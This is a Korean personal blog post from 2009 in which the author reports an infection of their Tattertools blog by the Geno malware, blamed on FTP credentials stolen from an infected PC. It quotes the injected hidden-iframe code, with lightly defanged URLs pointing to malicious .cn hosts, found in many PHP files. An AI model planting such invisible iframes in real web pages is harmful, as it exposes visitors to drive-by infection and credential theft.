제노(Geno) 바이러스 감염

2009. 6. 24. 13:12 [ 기억 저편의 것들/미분류 ] 모바일 버전으로 보기


ggerzer.com 블로그(버전:tattertools-1.1.3-expansion) 먹통

■ 1차 발견 - 2009년 6월 18일 목요일

(1)
태터툴즈관련 plugins 폴더내 거의 모든 플러그인 각각의 index.php 에
<iframe src="에이치티티피클론슬러쉬슬러쉬 globalmixgroup.cn:8080/ts/in.cgi?pepsi64" width=125 height=125 style="visibility: hidden"></iframe> 및
<iframe src="에이치티티피클론슬러쉬슬러쉬 hugebestbuy.cn:8080/index.php" width=126 height=196 style="visibility: hidden"></iframe> 의 내용이 심어져 있었음.

(2)
태터툴즈관련 blog/owner 폴더 위주로 index.php와 main.php에 위와같이 감염.

(3)
그외 홈페이지 계정내 몇몇 폴더의 index.php/htm/html, main.php/htm/html 파일도 감염.


■ 2차 발견 - 2009년 6월 23일 화요일 오후

1차 발견때와 동일한 폴더 및 파일들이 재감염.
단, 도메인이 namegamestore.cn:8080/index.php 와 shopfilmexistence.cn:8080/index.php 로 변경.



현재(2009.06.24)
감염 이전의 파일들로 모두 복구한 상태이나, 언제 또다시 감염될지 모르겠음..




제노 바이러스는 2009년 5월 22일자 뉴스에서부터 검색이 되고 있다. 검색으로 알아본 결과;;
제노(Geno) 바이러스는 일본의 컴퓨터 판매 사이트인 제노라는 업체 홈페이지가 지난 4월 해킹을 당해 이 악성코드가 전파되면서 알려졌으며, 만일 PC 사용자가 이 악성코드에 감염된 숙주 사이트에 접근할 경우, PC에 어도비(Adobe) 아크로뱃(Acrobat)이나 플래시(Flash) 취약점을 통해 PC가 제노 바이러스에 감염됩니다. 이 악성코드에 감염된 PC는 사용자가 FTP 로그인을 하면 계정정보가 유출될 수 있으며 특정 웹사이트로 강제 이동시키는 증상도 나타납니다. 또 일부 백신 소프트웨어 실행이 중지되고 해당 백신 소프트웨어 사이트의 접속이 차단돼 더 큰 피해를 가져올 수 있습니다.

나의 경우, (언제 어디서 어떻게 감염됐는지는 모르겠지만) 제노 악성코드에 감염된 내 PC 에서,
내 홈페이지 계정으로 FTP 로그인을 시도한적이 있기때문에, 나의 FTP 로그인 정보를 빼내어 홈페이지 파일을 강제 수정하여 iframe 자바스크립트 코드를 삽입한 것으로 추정됨..

한동안 FTP 접속할 일이 거의 없었는데,, 공교롭게도 6월18일 romeo1052님의 질문글에 답변하기 위해서 다이어리스킨 소스를 살펴보려고 잠시 FTP 접속했었다는것!!!
그렇다고해서 뭐 속좁게 romeo1052님을 원망한다거나 증오한다거나 그러진 않는다는것을 밝히고 싶다.



Write a comment